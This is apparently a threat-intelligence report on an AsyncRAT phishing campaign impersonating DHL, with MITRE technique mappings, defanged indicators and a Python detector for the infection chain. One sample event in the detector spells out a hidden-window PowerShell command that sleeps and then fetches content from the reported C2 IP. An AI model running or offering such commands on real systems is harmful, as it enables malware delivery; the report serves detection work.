Technical Analysis of an AsyncRAT Attack Impersonating DHL

This report technically analyzes an attack that leverages AsyncRAT, a remote access trojan (RAT), delivered through a phishing campaign impersonating DHL. It outlines the Indicators of Compromise (IoCs), the tactics employed by the attacker, and recommendations for mitigating the risk. Affected: DHL and organizations vulnerable to phishing attacks.

Key points:

  • AsyncRAT is used to establish remote access and persistence in compromised systems.
  • The attack uses phishing emails impersonating DHL to lure users into downloading malicious files.
  • The malicious link leads to a compressed file that contains a .vbs script.
  • The script connects to a remote server to download further content and hides its activity by running PowerShell commands in a hidden window.
  • Indicators of Compromise (IoCs) associated with the attack are identified and documented for remediation.
  • Recommendations include blocking suspicious IP addresses and implementing advanced email filtering solutions.

MITRE Techniques:

  • Develop Capabilities: Malware (T1587.001): Use of AsyncRAT for remote access capabilities.
  • Phishing: Spearphishing Link (T1566.002): Delivery of a phishing email using a DHL identity with a download link.
  • User Execution: Malicious File (T1204.002): The deceived user executed the malicious file.
  • Command and Scripting Interpreter: Visual Basic (T1059.005): Execution of the malicious .vbs script after download.
  • Command and Scripting Interpreter: PowerShell (T1059.001): PowerShell invoked to execute additional commands for malware operation.
  • Modify Registry (T1112): The malware altered Windows registry entries to conceal its presence.
  • Hide Artifacts: Hidden Window (T1564.003): PowerShell script executed with a hidden window style to avoid detection.
  • Virtualization/Sandbox Evasion: Time Based Evasion (T1497.003): Used 'sleep' commands to bypass virtualization/sandbox environments.
  • Query Registry (T1012): The malware queried registry keys during the attack.
  • Application Layer Protocol: Web Protocols (T1071.001): Used HTTP requests for command and control communication.
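
The chain above (script host launching PowerShell with a hidden window, a sleep delay, then an HTTP request to the reported C2 address) can be turned into a simple process-creation detection. The following is an added example, not code from the report or its author; the event field names and the sample log records are constructed for illustration, and only the network IoCs come from the page.

```python
import re
from dataclasses import dataclass

# Network IoCs quoted from the report (written undefanged so they match raw logs).
C2_HOSTS = {"144.91.79.54", "45.74.19.10"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


@dataclass
class ProcEvent:
    """Minimal process-creation record; the field names are an assumption."""
    parent: str
    image: str
    cmdline: str


def score_event(ev: ProcEvent) -> list[str]:
    """Return the MITRE-tagged indicators that fire for one PowerShell launch."""
    hits: list[str] = []
    if ev.image.lower() != "powershell.exe":
        return hits
    cl = ev.cmdline.lower()
    if ev.parent.lower() in SCRIPT_HOSTS:
        hits.append("T1059.005->T1059.001 PowerShell spawned by a script host")
    if re.search(r"-w(indowstyle)?\s+hidden", cl):
        hits.append("T1564.003 hidden window style")
    if "start-sleep" in cl:
        hits.append("T1497.003 sleep-based delay")
    hosts = re.findall(r"https?://([0-9.]+)", cl)
    if any(h in C2_HOSTS for h in hosts):
        hits.append("T1071.001 request to a known C2 host")
    return hits


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> indicators, keeping only events that fired at least once."""
    return {i: h for i, ev in enumerate(events) if (h := score_event(ev))}


# Constructed sample events, not real telemetry from the incident.
SAMPLE_EVENTS = [
    ProcEvent("wscript.exe", "powershell.exe",
              "powershell.exe -WindowStyle Hidden -Command Start-Sleep 30; "
              "Invoke-WebRequest http://144.91.79.54/15012025"),
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"),
    ProcEvent("cscript.exe", "cmd.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].parent, "->", "; ".join(hits))
```

Only the first sample event fires, with all four indicators; the scheduled backup script and the non-PowerShell child produce no hits.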

Indicators of Compromise:

  • [URL] hxxps://files-accl[.]zohoexternal[.]com/public/workdrive-external/download/afgzzad5ae19b67e043c58f6c91e20d8edb2b?x-cli-msg=%7B%22linkId%22%3A%22a7YZIcvjEC5-Xk88i%22%2C%22isFileOwner%22%3Afalse%2C%22version%22%3A%221.0%22%7D
  • [IP Address] 144[.]91.79.54
  • [URL] hxxp://144[.]91.79.54/15012025
  • [IP Address] 45[.]74.19.10
  • [IP Address] 192[.]168.100.231 (RFC 1918 private address; not usable as an external blocklist indicator)

Full Story: https://medium.com/@alexandrecasa/an%C3%A1lisis-t%C3%A9cnico-de-un-ataque-asyncrat-suplantando-a-dhl-df4a6b2d9fbe?source=rss——malware-5